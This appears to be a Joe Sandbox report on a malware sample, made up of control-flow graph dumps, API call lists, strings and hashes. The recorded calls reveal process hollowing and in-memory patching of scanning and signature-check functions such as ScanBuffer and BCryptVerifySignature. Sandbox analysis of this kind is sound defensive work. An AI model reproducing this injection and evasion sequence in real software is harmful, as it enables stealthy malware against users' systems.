37167->37171 37170 2af4860 11 API calls 37168->37170 37172 2b18755 37169->37172 37178 2b19d92 37170->37178 37174 2b195bb 37171->37174 37180 2b089d0 20 API calls 37172->37180 37177 2b089d0 20 API calls 37173->37177 37176 2af4860 11 API calls 37174->37176 37179 2b089d0 20 API calls 37175->37179 37186 2b195dc 37176->37186 37181 2b17c19 37177->37181 37184 2af47ec 11 API calls 37178->37184 37182 2b187ea 37179->37182 37180->37151 37183 2af4860 11 API calls 37181->37183 37185 2af4860 11 API calls 37182->37185 37190 2b17c3a 37183->37190 37188 2b19dc9 37184->37188 37189 2b1880b 37185->37189 37187 2af47ec 11 API calls 37186->37187 37194 2b19613 37187->37194 37191 2b089d0 20 API calls 37188->37191 37192 2af47ec 11 API calls 37189->37192 37193 2af47ec 11 API calls 37190->37193 37195 2b19ded 37191->37195 37200 2b18842 37192->37200 37198 2b17c71 37193->37198 37197 2b089d0 20 API calls 37194->37197 37196 2af4860 11 API calls 37195->37196 37203 2b19e0e 37196->37203 37199 2b19637 37197->37199 37202 2b089d0 20 API calls 37198->37202 37201 2af4860 11 API calls 37199->37201 37204 2b089d0 20 API calls 37200->37204 37208 2b19658 37201->37208 37205 2b17c95 37202->37205 37207 2af47ec 11 API calls 37203->37207 37206 2b18866 37204->37206 37210 2af4860 11 API calls 37205->37210 37209 2af49f8 11 API calls 37206->37209 37213 2b19e45 37207->37213 37212 2af47ec 11 API calls 37208->37212 37211 2b1888a 37209->37211 37217 2b17cd5 37210->37217 37214 2af4860 11 API calls 37211->37214 37218 2b1968f 37212->37218 37215 2b089d0 20 API calls 37213->37215 37216 2b188b9 37214->37216 37222 2b19e69 37215->37222 37223 2b188c4 37216->37223 37219 2af47ec 11 API calls 37217->37219 37220 2b089d0 20 API calls 37218->37220 37226 2b17d0c 37219->37226 37221 2b196b3 37220->37221 37224 2b0f094 11 API calls 37221->37224 37228 2b089d0 20 API calls 37222->37228 37225 2af47ec 11 API calls 37223->37225 37227 2b196ce 37224->37227 37229 2b188f0 37225->37229 37231 2b089d0 20 API calls 37226->37231 37230 2af4860 11 API calls 
37227->37230 37234 2b19e9c 37228->37234 37235 2b188fb 37229->37235 37236 2b196f7 37230->37236 37232 2b17d30 37231->37232 37233 2af4860 11 API calls 37232->37233 37242 2b17d51 37233->37242 37238 2b089d0 20 API calls 37234->37238 37237 2b089d0 20 API calls 37235->37237 37240 2af4860 11 API calls 37236->37240 37239 2b18914 37237->37239 37243 2b19ecf 37238->37243 37241 2af4860 11 API calls 37239->37241 37246 2b1972f 37240->37246 37245 2b18935 37241->37245 37244 2af47ec 11 API calls 37242->37244 37247 2b089d0 20 API calls 37243->37247 37250 2b17d88 37244->37250 37249 2af47ec 11 API calls 37245->37249 37248 2af47ec 11 API calls 37246->37248 37252 2b19f02 37247->37252 37254 2b19766 37248->37254 37255 2b1896c 37249->37255 37251 2b089d0 20 API calls 37250->37251 37253 2b17dac 37251->37253 37257 2b089d0 20 API calls 37252->37257 37256 2af4860 11 API calls 37253->37256 37258 2b089d0 20 API calls 37254->37258 37260 2b089d0 20 API calls 37255->37260 37266 2b17dcd 37256->37266 37259 2b19f35 37257->37259 37261 2b1978a 37258->37261 37262 2af4860 11 API calls 37259->37262 37263 2b18990 37260->37263 37264 2af4860 11 API calls 37261->37264 37268 2b19f56 37262->37268 37265 2af4860 11 API calls 37263->37265 37270 2b197ab 37264->37270 37269 2b189b1 37265->37269 37267 2af47ec 11 API calls 37266->37267 37274 2b17e04 37267->37274 37271 2af47ec 11 API calls 37268->37271 37272 2af47ec 11 API calls 37269->37272 37273 2af47ec 11 API calls 37270->37273 37276 2b19f8d 37271->37276 37279 2b189e8 37272->37279 37278 2b197e2 37273->37278 37275 2b089d0 20 API calls 37274->37275 37277 2b17e28 37275->37277 37281 2b089d0 20 API calls 37276->37281 38196 2b05aec 42 API calls 37277->38196 37283 2b089d0 20 API calls 37278->37283 37285 2b089d0 20 API calls 37279->37285 37284 2b19fb1 37281->37284 37287 2b19806 37283->37287 37288 2af4860 11 API calls 37284->37288 37289 2b18a0c 37285->37289 37286 2b17e54 37294 2af4bcc 11 API calls 37286->37294 37778 2af7e5c 37287->37778 37300 2b19fd2 37288->37300 38199 2b0d164 
23 API calls 37289->38199 37293 2b18a20 37296 2af4860 11 API calls 37293->37296 37297 2b17e69 37294->37297 37295 2b19aef 37299 2af4860 11 API calls 37295->37299 37303 2b18a46 37296->37303 37301 2af4860 11 API calls 37297->37301 37298 2af4860 11 API calls 37305 2b19839 37298->37305 37304 2b19b10 37299->37304 37302 2af47ec 11 API calls 37300->37302 37307 2b17e8a 37301->37307 37310 2b1a009 37302->37310 37306 2af47ec 11 API calls 37303->37306 37309 2af47ec 11 API calls 37304->37309 37308 2af47ec 11 API calls 37305->37308 37314 2b18a7d 37306->37314 37311 2af47ec 11 API calls 37307->37311 37315 2b19870 37308->37315 37316 2b19b47 37309->37316 37312 2b089d0 20 API calls 37310->37312 37318 2b17ec1 37311->37318 37313 2b1a02d 37312->37313 37317 2af4860 11 API calls 37313->37317 37319 2b089d0 20 API calls 37314->37319 37320 2b089d0 20 API calls 37315->37320 37321 2b089d0 20 API calls 37316->37321 37330 2b1a04e 37317->37330 37323 2b089d0 20 API calls 37318->37323 37322 2b18aa1 37319->37322 37324 2b19894 37320->37324 37325 2b19b6b 37321->37325 37326 2af4860 11 API calls 37322->37326 37327 2b17ee5 37323->37327 37328 2af4860 11 API calls 37324->37328 37329 2af4860 11 API calls 37325->37329 37333 2b18ac2 37326->37333 37332 2af49f8 11 API calls 37327->37332 37335 2b198b5 37328->37335 37336 2b19b8c 37329->37336 37331 2af47ec 11 API calls 37330->37331 37340 2b1a085 37331->37340 37334 2b17f02 37332->37334 37337 2af47ec 11 API calls 37333->37337 38197 2b07e50 17 API calls 37334->38197 37342 2af47ec 11 API calls 37335->37342 37339 2af47ec 11 API calls 37336->37339 37345 2b18af9 37337->37345 37347 2b19bc3 37339->37347 37344 2b089d0 20 API calls 37340->37344 37341 2b17f08 37343 2af4860 11 API calls 37341->37343 37346 2b198ec 37342->37346 37348 2b17f29 37343->37348 37352 2b1a0a9 37344->37352 37349 2b089d0 20 API calls 37345->37349 37350 2b089d0 20 API calls 37346->37350 37351 2b089d0 20 API calls 37347->37351 37354 2af47ec 11 API calls 37348->37354 37353 2b18b1d 37349->37353 37355 2b19910 
37350->37355 37356 2b19be7 37351->37356 37360 2b089d0 20 API calls 37352->37360 37357 2af4860 11 API calls 37353->37357 37361 2b17f60 37354->37361 37358 2af4860 11 API calls 37355->37358 37359 2af4860 11 API calls 37356->37359 37362 2b18b3e 37357->37362 37363 2b19931 37358->37363 37364 2b19c08 37359->37364 37365 2b1a0dc 37360->37365 37366 2b089d0 20 API calls 37361->37366 37367 2af47ec 11 API calls 37362->37367 37369 2af47ec 11 API calls 37363->37369 37370 2af47ec 11 API calls 37364->37370 37371 2b089d0 20 API calls 37365->37371 37368 2b17f84 37366->37368 37373 2b18b75 37367->37373 37372 2af4860 11 API calls 37368->37372 37374 2b19968 37369->37374 37375 2b19c3f 37370->37375 37376 2b1a10f 37371->37376 37377 2b17fa5 37372->37377 37378 2b089d0 20 API calls 37373->37378 37379 2b089d0 20 API calls 37374->37379 37380 2b089d0 20 API calls 37375->37380 37381 2b089d0 20 API calls 37376->37381 37383 2af47ec 11 API calls 37377->37383 37382 2b18b99 37378->37382 37384 2b1998c 37379->37384 37385 2b19c63 37380->37385 37393 2b1a142 37381->37393 37386 2b18ba2 37382->37386 37387 2b18bb9 37382->37387 37394 2b17fdc 37383->37394 37388 2b0e358 11 API calls 37384->37388 37389 2af4860 11 API calls 37385->37389 38200 2b08730 17 API calls 37386->38200 37391 2af4860 11 API calls 37387->37391 37392 2b199a1 37388->37392 37398 2b19c84 37389->37398 37400 2b18bda 37391->37400 37395 2af4530 11 API calls 37392->37395 37399 2b089d0 20 API calls 37393->37399 37401 2b089d0 20 API calls 37394->37401 37396 2b199b1 37395->37396 37397 2af4860 11 API calls 37396->37397 37406 2b199d2 37397->37406 37403 2af47ec 11 API calls 37398->37403 37407 2b1a175 37399->37407 37404 2af47ec 11 API calls 37400->37404 37402 2b18000 37401->37402 37405 2af4860 11 API calls 37402->37405 37408 2b19cbb 37403->37408 37410 2b18c11 37404->37410 37413 2b18021 37405->37413 37411 2af47ec 11 API calls 37406->37411 37409 2b089d0 20 API calls 37407->37409 37414 2b089d0 20 API calls 37408->37414 37412 2b1a1a8 37409->37412 37416 2b089d0 20 

Control-flow Graph (legend: Executed / Not Executed)
call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 6528->6580 6567->6424 6579->6580 6805 2b0a620-2b0a8b2 call 2b0894c * 2 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c * 5 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2b08080 call 2b0894c * 2 6580->6805 6805->6060
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000890,02B77424,ScanString,02B773A8,02B0A93C,UacInitialize,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,UacInitialize,02B773A8), ref: 02B09602
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B08471
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B086D5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetThreadContext.KERNEL32(00000890,02B77424,ScanBuffer,02B773A8,02B0A93C,ScanString,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,00000894,003FAFF8,02B774FC,00000004,02B77500), ref: 02B0A317
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000890,00000000,00000890,02B77424,ScanBuffer,02B773A8,02B0A93C,ScanString,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,00000894,003FAFF8,02B774FC), ref: 02B0A324
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2388221946-51457883
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a91eed34830aebca879b6b24bf6242815e0d1e74a7ad06714c1d512bc6becfd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2450e9b1980b492511c3b3965f5cc6cd8ddd1b123a225b16afe01e3452b1ca5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a91eed34830aebca879b6b24bf6242815e0d1e74a7ad06714c1d512bc6becfd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE2EF35B806199BDB52FBA4D9C0BCFB7BAAF88300F1045E1B705AB254DE34AE458F51

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000890,02B77424,ScanString,02B773A8,02B0A93C,UacInitialize,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,UacInitialize,02B773A8), ref: 02B09602
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B08471
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B086D5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3386062106-51457883
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7aa0e3d7700e78b4246833cadb8d54f06215e213c02f5e3e341db5c34170d18b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eba0b6cbf498972da7b569dd4c73c76364cf76361415733c496c360b619d6cfb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa0e3d7700e78b4246833cadb8d54f06215e213c02f5e3e341db5c34170d18b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E2EF35B806199BDB52FBA4D9C0BCFB7BAAF88300F1045E1B705AB254DE34AE458F51

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 10945 2af5acc-2af5b0d GetModuleFileNameA RegOpenKeyExA 10946 2af5b4f-2af5b92 call 2af5908 RegQueryValueExA 10945->10946 10947 2af5b0f-2af5b2b RegOpenKeyExA 10945->10947 10952 2af5bb6-2af5bd0 RegCloseKey 10946->10952 10953 2af5b94-2af5bb0 RegQueryValueExA 10946->10953 10947->10946 10949 2af5b2d-2af5b49 RegOpenKeyExA 10947->10949 10949->10946 10950 2af5bd8-2af5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10949->10950 10954 2af5c0f-2af5c13 10950->10954 10955 2af5cf2-2af5cf9 10950->10955 10953->10952 10956 2af5bb2 10953->10956 10958 2af5c1f-2af5c35 lstrlenA 10954->10958 10959 2af5c15-2af5c19 10954->10959 10956->10952 10960 2af5c38-2af5c3b 10958->10960 10959->10955 10959->10958 10961 2af5c3d-2af5c45 10960->10961 10962 2af5c47-2af5c4f 10960->10962 10961->10962 10963 2af5c37 10961->10963 10962->10955 10964 2af5c55-2af5c5a 10962->10964 10963->10960 10965 2af5c5c-2af5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 2af5c84-2af5c86 10964->10966 10965->10966 10966->10955 10967 2af5c88-2af5c8c 10966->10967 10967->10955 10968 2af5c8e-2af5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10955 10969 2af5cc0-2af5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10955
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5AE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B06
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02AF0000,02B1E790), ref: 02AF5B24
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02AF5B42
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02AF5B8B
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,02AF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02AF5BD1,?,80000001), ref: 02AF5BA9
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02AF5BD8,00000000,?,?,00000000,02AF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02AF5BCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02AF5BE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02AF5BF5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02AF5BFB
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02AF5C26
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5C6D
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5C7D
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5CA5
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5CB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02AF5CDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02AF5CEB
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f2e75bb43150ecfca3ba8e509bccf8f389df50e246a191d4706252537a36b77c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 136bea4545f287c1239ee5c6b73b77382a25e6fd98ca3810a6c75c9ae900abaf
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2e75bb43150ecfca3ba8e509bccf8f389df50e246a191d4706252537a36b77c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50519771E4025C7AFB61D7E48D86FEFB7AD9B04744F4001A1BB05E6181EF789A448FA0

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 13205 2b0894c-2b08971 LoadLibraryW 13206 2b08973-2b0898b GetProcAddress 13205->13206 13207 2b089bb-2b089c1 13205->13207 13208 2b089b0-2b089b6 FreeLibrary 13206->13208 13209 2b0898d-2b089ac call 2b07d78 13206->13209 13208->13207 13209->13208 13212 2b089ae 13209->13212 13212->13208
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e8940693a5ed822a6a85aab8fbfe46e1954ae29780034a27a47fa883c9fb5d1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e29e2ed4e2301bb0ca1464c6e825a8f9ab924e6ae925f8360c0c0f0586e21a9e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8940693a5ed822a6a85aab8fbfe46e1954ae29780034a27a47fa883c9fb5d1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F0A4B1EC03045EF350A668A989F57F79CD74079CF0289A9BA1887190CE74145AEF50

